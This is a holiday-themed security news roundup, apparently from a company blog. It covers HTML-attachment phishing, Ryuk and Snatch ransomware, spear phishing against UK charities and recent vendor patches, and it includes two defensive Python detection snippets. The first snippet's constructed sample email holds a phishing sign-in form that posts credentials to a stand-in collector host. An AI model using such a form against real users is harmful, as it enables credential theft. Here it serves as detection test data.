Welcome back to Threat Thursday!
With Christmas getting even closer, it’s safe to say fraudulent emails, elaborate phishing campaigns and a glut of new Ransomware aren’t on the top of your Christmas list. Yet that’s exactly what this season’s Cyber-Scrooges are serving up, as expected. Let’s jump right on in, shall we?
Hackers Cut Out the Middleman
Hackers, seemingly getting ruddy livid with our attempts to avoid their attacks, have started putting phishing websites directly into their emails. This trick was first revealed by Mimecast in July, and is seeing much more widespread use as the Christmas season draws nearer.
To avoid URL reputation checks, hackers are bundling HTML attachments into their phishing emails; the attachment opens the malicious page locally on the user’s device rather than from a site on the public internet, so there is no link for reputation services to check and no hosted site for the watchful eye of web users everywhere to spot, making these pages much harder to sniff out.
We’ll hand it to these industrious interlopers; this is a crafty scheme. It keeps malicious pages slightly more concealed from the public internet, and cuts out the need for a separately hosted phishing site and a link to it. Yet it’s no more resistant to the usual phishing awareness measures: check the sender’s address, don’t respond to any emails you aren’t expecting, and don’t open any attachments that you can’t identify.
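As an added example (not from Mimecast or the original post), a small Python check for exactly this kind of attachment: it opens a raw message, pulls out the HTML attachments and flags any carrying a sign-in form, since a locally opened page that posts credentials to a remote host is what the trick relies on. The sample message, the collector host and the filename are all constructed.

```python
import email, re
from email import policy
from html.parser import HTMLParser

# Constructed sample (not a real capture): the HTML attachment is a sign-in
# form that posts the entered credentials to a remote collector.
SAMPLE_EML = b"""\
From: "IT Support" <support@example.com>
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Please open the attached form to restore your mailbox.
--b1
Content-Type: text/html
Content-Disposition: attachment; filename="mailbox_restore.html"

<html><body><form method="post" action="https://collector.invalid/login">
<input name="user"><input type="password" name="pass"><input type="submit">
</form></body></html>
--b1--
"""

class FormScanner(HTMLParser):
    # Records form targets and password fields, the parts a phishing page needs.
    def __init__(self):
        super().__init__()
        self.form_actions, self.password_inputs = [], 0

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_inputs += 1

def assess_html(html: str) -> dict:
    # Suspicious: a form that collects a password or posts to an absolute URL.
    s = FormScanner()
    s.feed(html)
    external = [u for u in s.form_actions if re.match(r"https?://", u, re.I)]
    return {"password_inputs": s.password_inputs, "external_form_targets": external,
            "suspicious": bool(s.form_actions and (s.password_inputs or external))}

def scan_message(raw: bytes) -> list:
    # One assessment per HTML attachment; the plain body text is not scanned.
    msg = email.message_from_bytes(raw, policy=policy.default)
    return [dict(assess_html(p.get_content()), filename=p.get_filename())
            for p in msg.iter_attachments() if p.get_content_type() == "text/html"]
```

Any attachment reported as suspicious is one to quarantine rather than open, regardless of how plausible the covering email looks.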
Oh Look, Another Ryuk Development
Much like the Hellraiser franchise, this whole Ryuk debacle keeps receiving sequels that nobody asked for. Yet this latest development is such a fantastic posterchild for not paying Ransomware demands that we’re almost grateful it exists.
Why? Well, it appears that the developers of Ryuk have, with their latest release, bungled the Ryuk decryptor. That means anyone who’s suffered a Ryuk infection and pays the creators the ransom is very, very unlikely to get their files back unscathed.
That’s bad news for victims, sure. But it’s also bad news for Ryuk’s developers. Once word gets out that their decryptor is botched, victims will likely elect to just suffer the consequences, or seek professional assistance – either of which is a better option than throwing money away and being stuck with a compromised system.
We’ve always insisted that Ransomware victims should never pay the ransom, and this latest blunder from Ryuk is a stellar example as to why. Ryuk might be the real Grinch this Christmas, but it truly has given us the greatest gift of all: foresight. God bless us, everyone.
UK Government Warns Charities of Penny-Pinching Fraudsters
The UK government has issued a warning to charities following a spate of fraudulent emails. The emails, posing as members of staff, specifically target HR, finance or other relevant departments. They then go on to convince the recipient to change the bank details of the person the email is impersonating.
The emails are thought to be the product of some previous social engineering, as they convincingly mimic staff members and even have similar email addresses.
This method of ‘spear phishing’ is more intricate than the average phishing campaign, as it uses existing contact details to target specific people and companies. That’s why this alert is not one to be taken lightly. The government has urged all UK charities to review their internal procedures, avoid opening any unexpected emails, and compare any such emails against any known email addresses on record. We, naturally, would concur.
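An added example, not part of the government alert or the original post, of the comparison it recommends: a From: header is checked against a constructed staff directory, and a staff member’s name paired with a different address is reported, together with whether that address is a lookalike of the one on record.

```python
from email.utils import parseaddr

# Constructed staff directory (not real addresses): the "known email addresses
# on record" that the alert tells charities to compare incoming mail against.
DIRECTORY = {
    "Jane Doe": "jane.doe@charity.example",
    "Sam Finance": "sam.finance@charity.example",
}

def edit_distance(a: str, b: str) -> int:
    # Levenshtein distance: a small value between two different addresses
    # means a lookalike (a swapped letter, an extra character, '0' for 'o').
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def check_sender(from_header: str, directory=DIRECTORY, max_dist=3) -> dict:
    # A staff member's name paired with an address other than the recorded one
    # is the impersonation pattern in the alert; an unlisted name with no
    # matching address is merely an unknown sender.
    name, addr = parseaddr(from_header)
    name, addr = name.strip().lower(), addr.lower()
    known = {n.lower(): a.lower() for n, a in directory.items()}
    expected = known.get(name)
    if addr in known.values() and expected in (None, addr):
        return {"verdict": "on_record", "address": addr}
    nearest = min(known.values(), key=lambda a: edit_distance(addr, a))
    return {"verdict": "impersonation" if expected else "unknown_sender",
            "address": addr, "expected": expected, "nearest_on_record": nearest,
            "lookalike": edit_distance(addr, nearest) <= max_dist}
```

A request to change bank details that arrives with any verdict other than on_record is the moment to pick up the phone and confirm with the real staff member.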
‘Snatch’ Ransomware Returns with an All-New Method of Attack
As if one Ransomware threat wasn’t enough, another by the name of ‘Snatch’ has returned with a cunning new way to compromise devices.
In an exposé by Sophos, it’s been revealed that the latest version of Snatch forces a Windows device to reboot into Safe Mode, where the encryption process then begins. It’s thought that Safe Mode, in which endpoint protection software typically isn’t running, gives Snatch ample opportunity to spread unwatched through a victim’s machine. Not quite as ‘Safe’ as the mode would suggest, then.
Snatch was first discovered in the summer of 2018, but Sophos draws attention to this particular new strain because of its use of Safe Mode. As a diagnostic environment, it’s the last thing you want compromised in the event of rogue software, and Snatch’s latest trick is an especially cruel way to spread its campaign. Keep an eye out for any emails with unknown .exe files; it’s the most common way for Malware to spread and, until more is known about the latest attacks, the most likely culprit for any successful infections.
It’s not all bad news in the world of Cyber Security, however, as several vulnerabilities have been fixed in the latest software updates:
It Adobe Done: Numerous Critical Flaws Patched in Latest Adobe Update
There have been no fewer than 25 updates to common Adobe products in the developer’s latest release, which sees Acrobat Reader, ColdFusion 2018, Photoshop and more receiving some critical patches. Multiple remote code execution vulnerabilities have now been squashed, while Adobe assures us that there were no known instances of any being exploited before the patch.
If you don’t fancy being the first known victim, we’d recommend updating any and all Adobe products on your network systems, naturally.
New Patch Deployed to Avoid Void Androids
Last week, Google released a patch for three critical Android vulnerabilities, including one catastrophic denial of service exploit that could see devices irreparably compromised.
The latest Android bulletin goes into greater detail – but all you really need to know is that the update is live right now, and you’ll want it on any and all Android devices within your company.
Microsoft’s Patch Tuesday Fixes Zero Day Vulnerabilities, Makes For Dull Reading
Microsoft, much like us, addresses all its security concerns on a weekly basis, so it stands to reason that they can’t all make for explosive reading (or an endless supply of humorous headlines, much to our chagrin). Therefore, Microsoft’s most pressing patch will be presented, this week, in limerick form:
An exploit in Win32k
Could see hackers making their way
Into sensitive data
(which they’ll compromise later)
So make sure to upgrade, okay?
It appears there’s a vulnerability in the Win32k kernel-mode component that could see a hacker run ‘arbitrary code in kernel mode’, whereby the attacker could access, amend or delete a user’s data, as well as create new users with escalated access rights. This is fixed in the latest Windows update, and so too are a few critical flaws in Skype for Business, Microsoft Office and Internet Explorer. You can view them all in the release notes here.
And that’s another Threat Thursday wrapped up for this week. With Christmas on the way, we urge all businesses, individuals and charities to be especially aware of phishing attacks and fraudulent websites – they’re going to be in abundance this time of year.